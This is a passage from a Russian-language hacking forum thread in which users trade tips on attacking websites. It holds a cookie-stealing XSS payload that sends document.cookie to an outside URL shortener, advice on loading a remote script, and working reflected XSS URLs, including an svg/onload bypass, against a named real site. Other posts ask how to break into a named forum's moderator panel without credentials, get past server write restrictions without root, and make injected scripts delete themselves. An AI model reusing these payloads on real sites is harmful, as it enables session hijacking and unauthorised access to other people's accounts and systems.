HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #321  
Старый 12.07.2015, 01:23
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Цитата:
Сообщение от djon  
djon said:

Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG?
"+document.cookie; укоротить до 45 символов ?
Подключите удаленный скрипт
 
Ответить с цитированием

  #322  
Старый 12.07.2015, 02:41
Bragal
Guest
Сообщений: n/a
Провел на форуме:
4134

Репутация: 0
По умолчанию

На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д Как админ так хитро ограничил доступ?
 
Ответить с цитированием

  #323  
Старый 12.07.2015, 02:54
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от Bragal  
Bragal said:

На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д
Как админ так хитро ограничил доступ?
Ничего хитрого, просто правильно расставлены ограничения.
 
Ответить с цитированием

  #324  
Старый 12.07.2015, 03:09
Bragal
Guest
Сообщений: n/a
Провел на форуме:
4134

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:

Ничего хитрого, просто правильно расставлены ограничения.
И каким же образом? Реально обойти без получения рута?
 
Ответить с цитированием

  #325  
Старый 12.07.2015, 11:32
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от djon  
djon said:

Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG?
"+document.cookie; укоротить до 45 символов ?
Цитата:
Сообщение от ocheretko  
ocheretko said:

Подключите удаленный скрипт
на всякий случай можно без кавычек и без http.
 
Ответить с цитированием

  #326  
Старый 12.07.2015, 13:32
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Цитата:
Сообщение от 3ran  
3ran said:

Все просто,юзай вот эту ссылку -
http://4cheat.ru/modcp/
Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? .
 
Ответить с цитированием

  #327  
Старый 12.07.2015, 15:23
nik1201
Guest
Сообщений: n/a
Провел на форуме:
13708

Репутация: 0
По умолчанию

Привет всем,можно ли создать скрипт самоудаляющейся чтобы и теги его тоже удалялись?
 
Ответить с цитированием

  #328  
Старый 13.07.2015, 00:11
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861

Репутация: 5
Отправить сообщение для EoGeneo с помощью ICQ
По умолчанию

Цитата:
Сообщение от nik1201  
nik1201 said:

Привет всем,можно ли создать скрипт
самоудаляющейся чтобы и теги его тоже удалялись?
можно
 
Ответить с цитированием

  #329  
Старый 13.07.2015, 00:35
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:

Код:
Code:
alert(/olololkin2/);
Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox

Код:
Code:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1

User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
В первый раз такое. Адрес:

Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221
 
Ответить с цитированием

  #330  
Старый 13.07.2015, 00:53
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от ocheretko  
ocheretko said:

Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:
Код:
Code:
alert(/olololkin2/);
Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox
Код:
Code:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1

User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
В первый раз такое. Адрес:
Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221
я пока сам не понял в чем дело, однако prompt() срабатывает:

Код:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ